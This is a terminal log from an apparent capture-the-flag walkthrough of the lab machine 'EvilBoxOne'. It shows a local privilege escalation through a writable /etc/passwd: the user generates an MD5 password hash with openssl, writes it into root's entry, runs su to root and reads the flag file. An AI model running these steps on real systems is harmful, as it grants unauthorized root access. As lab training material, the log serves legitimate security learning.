bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
mowree@EvilBoxOne:~$ tail etc/passwd
tail: no se puede abrir 'etc/passwd' para lectura: No existe el fichero o el directorio
mowree@EvilBoxOne:~$ cat /etc/passwd | tail -n 1
mowree@EvilBoxOne:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
mowree@EvilBoxOne:~$ su attacker
su: el usuario attacker no existe
mowree@EvilBoxOne:~$ ping 8.8.8.8
connect: La red es inaccesible
mowree@EvilBoxOne:~$ ls
attack user.txt
mowree@EvilBoxOne:~$ cat attack
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
# openssl passwd -1 password 'command_output'
# then attach attacker to this 'command_output'
# attacker:'command_output' 'string'
# Now we need to place 'string' into /etc/passwd using echo command
# echo 'string' >> /etc/passwd
# later, we can su attacker!
mowree@EvilBoxOne:~$ nano attack
mowree@EvilBoxOne:~$ cat attack
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
# openssl passwd -1 password 'command_output'
# then attach attacker to this 'command_output'
# attacker:'command_output' 'string'
# Now we need to place 'string' into /etc/passwd using echo command
# echo 'string' >> /etc/passwd
# later, we can su attacker!
mowree@EvilBoxOne:~$ echo attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/ >> /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:/
mowree@EvilBoxOne:~$ echo "attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme" >> /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:/
attacker2:
mowree@EvilBoxOne:~$ echo 'attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme' >> /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:/
attacker2:
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
mowree@EvilBoxOne:~$ nano /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
mowree@EvilBoxOne:~$ su attacker2
su: el usuario attacker2 no existe
mowree@EvilBoxOne:~$
mowree@EvilBoxOne:~$
mowree@EvilBoxOne:~$ echo 'alright. how about we replace x at root'
alright. how about we replace x at root
mowree@EvilBoxOne:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
mowree@EvilBoxOne:~$ echo 'root:x:0:0:root:/root:/bin/bash'
root:x:0:0:root:/root:/bin/bash
mowree@EvilBoxOne:~$ echo 'let us replace x with our hash then su root'
let us replace x with our hash then su root
mowree@EvilBoxOne:~$
mowree@EvilBoxOne:~$
mowree@EvilBoxOne:~$ echo '$1$mDHMu235$dP3Xu6DnA067MXmUdbsme'
$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
mowree@EvilBoxOne:~$ nano /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
root:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
mowree@EvilBoxOne:~$ su root
Contraseña:
su: Fallo de autenticación
mowree@EvilBoxOne:~$ echo 'wasn't the password passwd'
>
> "
> ^C
mowree@EvilBoxOne:~$ su root
Contraseña:
su: Fallo de autenticación
mowree@EvilBoxOne:~$ openssl passwd -1 root
$1$AI/NUW0r$4p4AeMceoB9TJDnKGnqxg1
mowree@EvilBoxOne:~$ nano /etc/passwd
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree# id
uid=0(root) gid=0(root) grupos=0(root)
root@EvilBoxOne:/home/mowree# whoami
root
root@EvilBoxOne:/home/mowree# ls
attack user.txt
root@EvilBoxOne:/home/mowree# cd /root
root@EvilBoxOne:~# ls
root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
root@EvilBoxOne:~#since I love hitman game && current machine title is evilbox, here is the cover photo for this article
